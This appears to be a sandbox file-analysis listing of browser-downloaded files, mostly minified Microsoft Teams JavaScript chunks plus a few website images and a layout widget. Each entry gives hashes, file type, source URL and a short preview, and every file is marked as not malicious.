                                                                                                                                                                                                                          SHA-256:585E4222AB14A20626250F16584CAACAE44B4CFC0770F9D24EA9EA86E50E4D1C
                                                                                                                                                                                                                          SHA-512:CBF73C3C93864952E8A4FB6BE07DA0A6FDE47D5C631141F981C9A90AEA3DBD37EC08480A93B7B069990AE5EFE9E22E1D59ECCDC804BFA974BF1347647240CFD5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/batched-remoteEntry-dee5c437121d5c6f0bda.js
                                                                                                                                                                                                                          Preview:"use strict";var sidecarDiagnostics,sidecarChatZeroState,sidecarMeetApp,sidecarTflOnboarding,sidecarUserContext,sidecarI18nContext,sidecarHtmlSanitizerContext,sidecarAriaLiveContext,sidecarFocusManagementContext;(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[150699],{564961:(e,t,r)=>{var i={".":()=>Promise.all([r.e(587200),r.e(918681),r.e(750818),r.e(978582),r.e(733423),r.e(702584),r.e(49586),r.e(367927),r.e(268921),r.e(842549),r.e(459628),r.e(664062),r.e(994444),r.e(35871)]).then((()=>()=>r(431810)))},n=(e,t)=>(r.R=t,t=r.o(i,e)?i[e]():Promise.resolve().then((()=>{throw new Error('Module "'+e+'" does not exist in container.')})),r.R=void 0,t),a=(e,t,i)=>{if(i&&(r.tu=i),r.S){var n="default",a=r.S[n];if(a&&a!==e)throw new Error("Container initialization failed as it has already been initialized with a different share scope");return r.S[n]=e,r.I(n,t)}};r.d(t,{get:()=>n,init:()=>a})}},e=>{e.O(0,[921072],(()=>(564961,e(e.s=564961))));var t
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (33000)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):33108
                                                                                                                                                                                                                          Entropy (8bit):5.412771564965738
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:t3njFfVkZBauR0Rke9v54B+jjkasi6juRYb0AKnOU1ovzywyu3CMMRtw2L6HNPjE:28uR0RkeMjuRYb0AKnOU1ovzywyptw2b
                                                                                                                                                                                                                          MD5:151E852AC972E6EB3FF7F799813CACFE
                                                                                                                                                                                                                          SHA1:730FE4CC00AF6B36026AFC895C0055EB2FC20F98
                                                                                                                                                                                                                          SHA-256:E066550039057E9E563F40FA2D1856088F49274A34E586565D56A573690F1B5C
                                                                                                                                                                                                                          SHA-512:2D37C4E3403E06D6062E9783C9A2AEDE3F106ECFD6192F23F1F4AF05C17F51767838A1D894BD7E7D1261D52A2B339B0D1A288CE1978D280A2BB67F6D0EE557C1
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/669152-07edb61a22aacff3.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[669152],{380015:(r,e,o)=>{o.d(e,{h:()=>l,m:()=>u});var a=o(594900),t=o(649380),d=o(197609);const n=t.TQ.reduce(((r,e)=>{const o=e.slice(0,1).toUpperCase()+e.slice(1),t={[`colorPalette${o}Background1`]:a.yd[e].shade40,[`colorPalette${o}Background2`]:a.yd[e].shade30,[`colorPalette${o}Background3`]:a.yd[e].primary,[`colorPalette${o}Foreground1`]:a.yd[e].tint30,[`colorPalette${o}Foreground2`]:a.yd[e].tint40,[`colorPalette${o}Foreground3`]:a.yd[e].tint20,[`colorPalette${o}BorderActive`]:a.yd[e].tint30,[`colorPalette${o}Border1`]:a.yd[e].primary,[`colorPalette${o}Border2`]:a.yd[e].tint20};return Object.assign(r,t)}),{});n.colorPaletteRedForeground3=a.yd.red.tint30,n.colorPaletteRedBorder2=a.yd.red.tint30,n.colorPaletteGreenForeground3=a.yd.green.tint40,n.colorPaletteGreenBorder2=a.yd.green.tint40,n.colorPaletteDarkOrangeForeground3=a.yd.darkOrange.tint30,n.colorPaletteDarkOrangeBor
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):129495
                                                                                                                                                                                                                          Entropy (8bit):5.264148032458579
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:nvIDpltjnNK4MKEs6iifxAmrQ76GBtBkQjyMAz8f:ngS46MBkQio
                                                                                                                                                                                                                          MD5:3C93003ED2005FC512F13D8296A28B2E
                                                                                                                                                                                                                          SHA1:E080952C0FCDD6DC9136537D89C57B78E38512AF
                                                                                                                                                                                                                          SHA-256:3131BF1591179C74E8D2020D73EB09742CA931075C3EA7BA5AFEFC4D76400814
                                                                                                                                                                                                                          SHA-512:34E6940C6D7BF5F84B614499AAD8C60744ED2F8F8496603180B2BA419D7C6849B35E8DE80D0CD5E01AD83A42D20EA378DB85FD6A6398D69CD24C6D6EC6B0868F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[638637],{323707:(e,n,t)=>{var r=t(513432),l=t(253070);function a(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var u=new Set,o={};function i(e,n){s(e,n),s(e+"Capture",n)}function s(e,n){for(o[e]=n,e=0;e<n.length;e++)u.add(n[e])}var c=!("undefined"==typeof window||void 0===window.document||void 0===window.document.createElement),f=Object.prototype.hasOwnProperty,d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (19349)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):19469
                                                                                                                                                                                                                          Entropy (8bit):5.469457610850632
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:0CH6vY11+WWdH4K481Bzy65hmGPg5f6+4UBev0DNK04476x39mFYVdACUmt5/7qQ:0CavY1v0HdBW65hc6+Fev08044s9mFqf
                                                                                                                                                                                                                          MD5:7F3F015837A71A5F44DB75E3AB4CE8C2
                                                                                                                                                                                                                          SHA1:2D4D1432798CCEFC1F9A1A3AA80707A7ED2296B4
                                                                                                                                                                                                                          SHA-256:E13A3426474D1993F36A0AE061DE6F4BD45CB68DCC68C903DEFE7C1DD8ED8482
                                                                                                                                                                                                                          SHA-512:D2B53FB9BE0DE75D5294273F5F7DC5909B585972495AE7ADB7EAEBA4B1C6AA95BDE5BE8AB05DC6C37DF25E71FC4B15285AD3A19F89274FADC853908298B9DB8A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[839569],{19493:(e,t,r)=>{var s;r.d(t,{Q:()=>s}),function(e){e[e.Missing=0]="Missing",e[e.Loading=1]="Loading",e[e.Loaded=2]="Loaded",e[e.Failed=3]="Failed"}(s||(s={}))},324011:(e,t,r)=>{r.d(t,{$n:()=>_,fj:()=>c,gI:()=>u,DU:()=>o,Co:()=>l,Xy:()=>m,lw:()=>h});const s=["aao","abh","abv","acm","acq","acw","acx","acy","adf","ads","ae","aeb","aec","afb","ajp","apc","apd","ar","arb","arc","arq","ars","ary","arz","auz","avl","ayh","ayl","ayn","ayp","bbz","bcc","bqi","ckb","dv","fa","glk","hbo","he","jpr","ku","men","mzn","nqo","pbt","pbu","peo","pes","pga","pnb","prd","prp","prs","ps","pst","sam","sd","shu","sqr","ssh","ug","ur","xaa","xmn","ydd","yhd","yi","yih","yud","pseudo_rtl"];var a=r(72393),n=r(802756);const i={af_ZA:1078,am_ET:1118,ar_AE:14337,ar_BH:15361,ar_DZ:5121,ar_EG:3073,ar_IQ:2049,ar_JO:11265,ar_KW:13313,ar_LB:12289,ar_LY:4097,ar_MA:6145,ar_OM:8193,ar_QA:16385,ar_SA:10
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65484), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):127510
                                                                                                                                                                                                                          Entropy (8bit):4.691752397420421
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:2NQAIJqdovv9QFXHpVHWbA+rfQDBmDoGVuQfOm5/Zh8a0q:8QAHdivK1HWbA+rfaBm+Q2mrx
                                                                                                                                                                                                                          MD5:69906B2052917E00F9E22503FDD6FB9C
                                                                                                                                                                                                                          SHA1:751F137E64D2B3944A1670521F1570C799E23A0A
                                                                                                                                                                                                                          SHA-256:122BE606A1B747EB76DDEE11D2D0BC514BAF4629499A36BBA0B761718608A5AE
                                                                                                                                                                                                                          SHA-512:32C950DDEE2B3ED960E62B48D8ED5D2103F10C6E5218C8C946F6E71E1CE28BEEAC032EE484ECEC02C5EB338565DF2CD1DAB949D656747ED8FCFD2D7F3E10DE82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/teams-and-channels-locale-en-us-f503fa26e6163205.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[316318],{436214:(e,a,t)=>{t.r(a),t.d(a,{default:()=>n});const n={namespace:"teamsAndChannels",locale:"en-us",translations:{activity_goto_team_title:"Go to the team",activity_tab_team_section_header:"Join teams {{firstName}} is active in",activity_tab_team_section_header_unresolved_user:"Join teams this person is active in",actor_reason_string_for_mention_team_or_channel:"{{actor}} mentioned {{channel}}",actor_reason_string_for_team_expire:"{{team_name}} is expiring soon",actor_reason_string_for_team_membership_change:"{{actor}} made you an owner of {{team_name}}",actor_reason_string_for_team_membership_change_in_a_private_or_shared_channel:"{{actor}} made you an owner of a channel",actor_reason_string_for_team_renewal:"{{team_name}} was renewed",add_guest_people_picker_header:"Add {{email}} as a guest?",add_member_close_button_aria_label:"Close",add_member_dialog_member_selec
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (652)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):765
                                                                                                                                                                                                                          Entropy (8bit):5.403587201614664
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12:/4p3sp38VFlHKVqZhZbZ9XVPBnMzHoFsnbFIJFse+mMcQZgDhsDzrhV2zLWEZJgJ:wp3sp38fNVj179BnMDwyKJFse+mMcQ5j
                                                                                                                                                                                                                          MD5:54D48CA40676CE5F69A75299285057CB
                                                                                                                                                                                                                          SHA1:A966259EFE700E5AC0CDDE0011BCAFB996E7AFF7
                                                                                                                                                                                                                          SHA-256:AA84EC5E9B9AE3037FC966D7B72208A6CD18649BBA5F74595724176370025EC1
                                                                                                                                                                                                                          SHA-512:70212CD3140E22187EE307F37EAC0A069848243762C86FB76747AF532035B299250C7A32E2B7CAF5648009DFD5991F73B52118218B6AF23A618767C291875E9C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[893369],{168570:(e,a,r)=>{r.r(a),r.d(a,{ClientSchema:()=>s,Schema:()=>n,ServerSchema:()=>t,resolvers:()=>i.u,typeDefs:()=>c});var t={};r.r(t);var s={};r.r(s);var n={};r.r(n);var c=r(876152),i=r(701426)},701426:(e,a,r)=>{r.d(a,{u:()=>n});var t=r(425104),s=r(699899);const n={BigInt:s.BM,DateTime:s.Ps,JSONData:s.kJ,ScalarEnumString:new t.Ag({name:"ScalarEnumString",description:"ScalarEnumString custom scalar type used for object that can use toString",parseValue:e=>e.toString(),serialize:e=>e.toString(),parseLiteral:e=>e&&e.value})}}}]);.//# sourceMappingURL=https://local.teams.office.com/sourcemaps/hashed-assets/data-schema-0ac7440254a0a997.js.map
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):3895900
                                                                                                                                                                                                                          Entropy (8bit):5.39232794493168
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:49152:GhoKeEA9gApAiHarj7wgx1k4pwFe0w4F2juOdHIYu5XTJUwguj1iTmFAnhKc7tkW:kFeG
                                                                                                                                                                                                                          MD5:39F0C9B578D2A20F9B62E5DF5A224332
                                                                                                                                                                                                                          SHA1:5BCD8E1E0B7D7259BB0FECC2228E2318DCA99AC5
                                                                                                                                                                                                                          SHA-256:96E8E1CDB27ACAD1F09E2F105B2BBA6ED711417599F8622754F3BC28D49B389E
                                                                                                                                                                                                                          SHA-512:DED6A03B3378269B7E4A2AF980CA7F5DE4E403721570EF3A975EB82CCFE5E3A98716A2F6AF0702F1490816A5D2FF94B6AED4ACAB0F0DEC87F1499D1858BF1F44
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[805610],{211014:(e,t,n)=>{"use strict";n.d(t,{b:()=>i});const i=(0,n(965804).O)({isStudentAvatar:{Bf4jedk:"f1ohpo60"},isParentAvatar:{Bf4jedk:"ff9fk16"}})},516404:(e,t,n)=>{"use strict";function i(e){return'<link\n rel="shortcut icon"\n type="image/x-icon"\n id="teams-favicon"\n href="[[staticsPath]]/evergreen-assets/icons/microsoft_teams_logo_refresh.ico"\n/>','<link\n rel="shortcut icon"\n type="image/x-icon"\n id="teams-favicon"\n href="[[staticsPath]]/evergreen-assets/icons/microsoft_teams_logo_refresh.ico"\n/>'}n.d(t,{A:()=>i})},10247:(e,t,n)=>{"use strict";function i(e){var t="";Array.prototype.join;return t+="<style>\n .preload-title-bar-trim {\n ","mac"===e.osPlatform?t+="\n --preload-title-bar-background-color: rgb(98, 100, 167);\n ":t+="\n --preload-title-bar-background-color: rgb(70, 71, 117);\n ",t+='\n\n background-color: var(--preload-title-bar-bac
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (61519)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):61625
                                                                                                                                                                                                                          Entropy (8bit):5.454418996166431
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:J8D47fVcFkRgOtD5Pjh3qEclWu8ioo/KI7wufTgthcPgLe49EnK/EnNckeLEp7OE:J8afVRgOtD5PjV/sUvsDNhdd
                                                                                                                                                                                                                          MD5:5509E16DAC095B6043858286190CB2B9
                                                                                                                                                                                                                          SHA1:45A642B6881F954038F49929D7FD2C5283FB68EE
                                                                                                                                                                                                                          SHA-256:3185557B3131838A753497C1557D544613CEB47D468B233905C139E5496F7B5D
                                                                                                                                                                                                                          SHA-512:C3A866A72C89614C6B8B97439B1DF2FC3DAEBB686B3464711FFAB8360CCDED2122722D2076A0C05EC8F71E448091CCDA3884A2489F6EBB0716EFC5B6AB767BF9
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[2754],{719156:e=>{var t;!function(e){!function(e){!function(e){e[e.None=0]="None",e[e.Notified=1]="Notified",e[e.Connecting=2]="Connecting",e[e.Connected=3]="Connected",e[e.LocalHold=4]="LocalHold",e[e.RemoteHold=5]="RemoteHold",e[e.Disconnecting=6]="Disconnecting",e[e.Disconnected=7]="Disconnected",e[e.Observing=8]="Observing",e[e.EarlyMedia=9]="EarlyMedia",e[e.InLobby=10]="InLobby",e[e.Preheating=11]="Preheating",e[e.Preheated=12]="Preheated",e[e.Staging=13]="Staging",e[e.NegotiatingEncryption=14]="NegotiatingEncryption",e[e.NegotiatingEncryptionLobby=15]="NegotiatingEncryptionLobby"}(e.CallState||(e.CallState={})),function(e){e[e.Testing=0]="Testing",e[e.MicrosoftWNS=1]="MicrosoftWNS",e[e.MicrosoftWP7NS=2]="MicrosoftWP7NS",e[e.AppleAPN=3]="AppleAPN",e[e.GoogleAGCM=4]="GoogleAGCM",e[e.Hotmail=5]="Hotmail",e[e.GoogleAC2DM=6]="GoogleAC2DM",e[e.Trouter=7]="Trouter",e[e.Griffin=8]="Griffin"
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (879)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1001
                                                                                                                                                                                                                          Entropy (8bit):5.101417090131756
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:wp3sp38fCaDiRFdhaKWv5iz77RfzSj3TXicEAzELRhc8N:wp3sp3ACzd3WvcxrkbzELN
                                                                                                                                                                                                                          MD5:FD46D921680CA184F472CA46E52795D2
                                                                                                                                                                                                                          SHA1:30A8E5422FDA4A8E8A271ACF1472B942A9DCDC94
                                                                                                                                                                                                                          SHA-256:AA3914B5961F002F6AEF22894193EDBBF0B0CD36F97530F2D4559084AF66C374
                                                                                                                                                                                                                          SHA-512:CFD1469F02B981FFC5BECC85717151C9E8258FA4EE1C05E521817BA2DD2995B052F3B1978208C2CB07BD2132CAC374D1AFB29449C36CC4A5BEC0DF723548512A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[227307],{467681:(e,a,l)=>{l.r(a),l.d(a,{default:()=>t});const t={namespace:"gallery",locale:"en-us",translations:{gallery_galleryEmptyStateMessage:"Photos added to chat automatically show up here.",gallery_galleryEmptyStateMessageCommunities:"Photos added to community automatically show up here.",gallery_galleryLoadingMessage:"Loading Photos...",gallery_gallery_grid_images:"Images from",gallery_gallery_grid_label:"Image gallery",gallery_imageGroupLastMonth:"Last Month",gallery_imageGroupMonth:"Earlier This Month",gallery_imageGroupToday:"Today",gallery_imageGroupWeek:"Earlier This Week",gallery_imageGroupYesterday:"Yesterday",gallery_imageLabel:"Image",gallery_image_menu_viewInChat:"View in Chat",gallery_image_menu_viewInCommunity:"View in Community"}}}}]);.//# sourceMappingURL=https://local.teams.office.com/sourcemaps/hashed-assets/gallery-locale-en-us-83a3d27de297752a.js.ma
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):9336
                                                                                                                                                                                                                          Entropy (8bit):7.9289876386620435
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:pTJ43QzhXG2frNX1j2D3VbOJODFExzdi7p0pcVh4qea4:pTDhXdrfONwoFEy7pci2Ba4
                                                                                                                                                                                                                          MD5:440ACEDBF6A21DCE4C94338785B0B185
                                                                                                                                                                                                                          SHA1:AC96847C1335DCDD50A4E96AE3C6095EB972A465
                                                                                                                                                                                                                          SHA-256:42B5DF0F79E43DE095ACB84C43BD97343627596340D299B8126D5B42D826B6C0
                                                                                                                                                                                                                          SHA-512:FEFB28CEF03D6E647F6812E207DA866FBB0F41E7E88591E3BED576029C4084AD8AAFB331D058CFBB7F2327411A6C6D56C0F8ED606A31FFD952342F8334B44F83
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:"https://img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/blob-92f0eb4.png/:/rs=w:201,h:66,cg:true,m/cr=w:201,h:66/qt=q:100/ll"
                                                                                                                                                                                                                          Preview:RIFFp$..WEBPVP8X...........A..VP8L.#../.@..M0j#...Y.... ....M .8^.{.bh.....t..!....f.6.$E....;q.8f|......$)*.E.......-F.$)....N...{1.....Gn.B...>. .(...w...0...*x...I?..._l......R...C.%D:|!B...,.....e.~.].M!tt\.Q,..-..b....m#'.......1..,.. .q..Rp..m;$...~......m.m.g<.:.m{.....)fEF..6...u....^^k..k.j..m.\Jmm.h13Y..7..,^.^.............A.9@...VJ.d.j.d.>....;......K.$,Y`.G..EB...2.$...Q)rh.5..l......x.4..9.&...t.w..m.m..am.N.6.4...k^x>&.v.m.$.y.................=..j.e..[...Yk...L."..c....a.3.O.MG.$G.....e.....8.....`.D...JJ.$I.....~...<]......Y....y...'..8.L.S....Z7..Q....\............n....-.!>...I.......[..`.....p.n..9.....kj.K...Jn.w.2q....Bh.09............7..[,...}.X.....K!....X.....E.....y.w..J.../.......w..?....}..............C.......E........I$..\x....x...^.J...~..{.}.{.}.s....?....S..\.;f..J...~...g..4....u...W..SOd.s G..@.|..s=..a.5l.*d..i....t.......A&9t....@......_..^9....7.gc.R....9...FN.o.E.....:.Z.l..c.....p..]....U...t.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):412
                                                                                                                                                                                                                          Entropy (8bit):5.483625893120041
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6:fZOoPOrKGI5YDHm/IrzqeCnTNKl/vtAgWjEPltls+4JeSEHj+iq0q5/jygP+k4q9:ESOXI5YjIE4E9tA0Pb3SkEl9q
                                                                                                                                                                                                                          MD5:5DD6CE63F6AB4419F6389A4E20642497
                                                                                                                                                                                                                          SHA1:DC60AD2AABCE1D57CA8A1A9968023EE38394936F
                                                                                                                                                                                                                          SHA-256:5B9215247EEFA1AA3E7233BDA8C3144F99CFEB5C2A8A2053DA7A59ACCCDEE501
                                                                                                                                                                                                                          SHA-512:983256A81344F03F3B1C921D720ED00C4BF0A93510E9DB868F490A703C4BD14E53649E741EA0C0211D0AC97C81CE81403B0B1FFDEF8AA3EA5F694D38A1C3446B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:"https://img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/favicon/909c1b4d-c97b-4914-b7e0-f39ba802c054/b773b1db-e964-4dd6-8fed-45fbfd73ffc5.png/:/rs=w:32,h:32,m"
                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8X..............VP8 .........*....>i*.E.".....@....X.i.... .,.$.h..=..*........F....:.......kH.7.S9.G.[-..........7.....q.............;...g.r../..6.c.(.......w...Zif.%{P{.P.......U.....N.N.pE...^.X.EXIF....Exif..II*...........................V...........^...(.......................i.......f.......8c......8c................0210....................0100........................................
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1854)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1904
                                                                                                                                                                                                                          Entropy (8bit):4.925874096987715
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:iCEX2wA83zdkJi1lvietWdcy0cy7mdOrxGfrIpb:NET3zdkJiDvietWdR0R7mdOFYs
                                                                                                                                                                                                                          MD5:A3DD10B90C8E60BEC1F22E13B47AD695
                                                                                                                                                                                                                          SHA1:E8793D96240098E5B0F801C19E70644388C3C6B9
                                                                                                                                                                                                                          SHA-256:EBAA7C65B7616917ED8F17F0136FAA8E50B376D1762D2A15CB51950CC1DF2370
                                                                                                                                                                                                                          SHA-512:6634ADC4EC9323E2017152A8D02054F4B622328C608F7048C2FD3655EC8EC7EC10C353830374BFA6B2101BCDC39273010C7106D05AF743CBBC9B1E521C99B22B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-dataAids-dc689f22.js",["exports"],(function(E){"use strict";var R=(global.keyMirror||guac.keymirror)({BACKGROUND_IMAGE_RENDERED:null,HAMBURGER_MENU_LINK:null,HEADER_WIDGET:null,HEADER_SECTION:null,HEADER_VIDEO:null,HEADER_VIDEO_EMBED_WRAPPER:null,HEADER_VIDEO_EMBED:null,HEADER_VIDEO_EMBED_INSET_POSTER:null,HEADER_VIDEO_EMBED_FILL_POSTER:null,HEADER_VIDEO_BACKGROUND:null,HEADER_VIDEO_FILL_POSTER:null,HEADER_SLIDESHOW:null,HEADER_SLIDE:null,HEADER_HERO_SLIDE:null,HEADER_PHONE_RENDERED:null,HEADER_PIPE_RENDERED:null,HEADER_ADDRESS_RENDERED:null,HEADER_LOGO_RENDERED:null,HEADER_LOGO_IMAGE_RENDERED:null,HEADER_LOGO_OVERHANG_CONTAINER:null,HEADER_LOGO_TEXT_RENDERED:null,HEADER_TAGLINE_RENDERED:null,HEADER_TAGLINE2_RENDERED:null,HEADER_NAV_RENDERED:null,HEADER_CTA_BTN:null,CART_ICON_RENDER:null,CART_ICON_COUNT:null,CART_ICON_PIPE:null,CART_TEXT:null,CART_DROPDOWN_RENDERED:null,SEARCH_FORM_RENDERED:null,SEARCH_ICON_RENDERED:null,SEARCH_ICON_RENDERED_OPEN:null,SEARCH
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):82543
                                                                                                                                                                                                                          Entropy (8bit):4.439588799496337
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:SjnIJEJER5S3E4QgcTvuydQDnDGCNxYYLvNbaUxV5fFWlpVvgIakl22arkiDluGA:SQEJERwJ6Q5ZDpFW/R8wBrtIPyoYjAM
                                                                                                                                                                                                                          MD5:E4EDA3353C02D83B0BAE1EA3F184DED6
                                                                                                                                                                                                                          SHA1:50DF4C1C65D6B4D6CB6B1E84BBEEB342AE70EABD
                                                                                                                                                                                                                          SHA-256:5DF8F1277C43DF55DBC88568A594E271C3956084AA2F0C2CFFD84C34E2F6A4AF
                                                                                                                                                                                                                          SHA-512:87058927EBD1CBBD7BA777AF33405169C1C558285E5137773BBE82E322049D3B171A4F303DA009A0568C5660C9FE39A06F35497CE0E1555933B4C3BCC532E6EC
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[169233],{169233:(a,l,h)=>{h.d(l,{ZtX:()=>c,vXm:()=>v,on3:()=>e,m61:()=>m,Yfv:()=>A,wbC:()=>M,l1P:()=>r,dcr:()=>H,$Vp:()=>V,tX_:()=>U,K4k:()=>i,gNM:()=>d,C$A:()=>C,QUO:()=>L,FV:()=>R,Jkc:()=>o,qw7:()=>t,eAs:()=>u,Co4:()=>n,ETz:()=>g,xyh:()=>F,BjN:()=>w,f9S:()=>p,Rl_:()=>s,tXH:()=>f,JAW:()=>k,dIR:()=>B,XST:()=>S,lOY:()=>I,Tu1:()=>E,mho:()=>b,g0A:()=>D,PCP:()=>_,hyw:()=>y,qTc:()=>T,cUx:()=>x,ryW:()=>X,lkJ:()=>z,cDX:()=>G,M5p:()=>O,__C:()=>Q,muQ:()=>q,SEp:()=>j,Yx5:()=>J,IEM:()=>P,SZX:()=>Y,abA:()=>W,mdF:()=>N,_tw:()=>K,a1m:()=>$,LI8:()=>aa,Tp5:()=>la,fXC:()=>ha,ZRs:()=>Za,nQe:()=>ca,l_X:()=>va,SGl:()=>ea,MZl:()=>ma,up$:()=>Aa,IM1:()=>Ma,iju:()=>ra,uEE:()=>Ha,a2s:()=>Va,Yi9:()=>Ua,iBC:()=>ia,GN6:()=>da,UEN:()=>Ca,Tdu:()=>La,Rvv:()=>Ra,Sub:()=>oa,qqS:()=>ta,ZJF:()=>ua,nn9:()=>na,W9G:()=>ga,Um6:()=>Fa,oYc:()=>wa,O35:()=>pa,PDr:()=>sa,P0w:()=>fa,r$t:()=>ka,JdG:()=>Ba,xKI:()=>Sa,rCW:
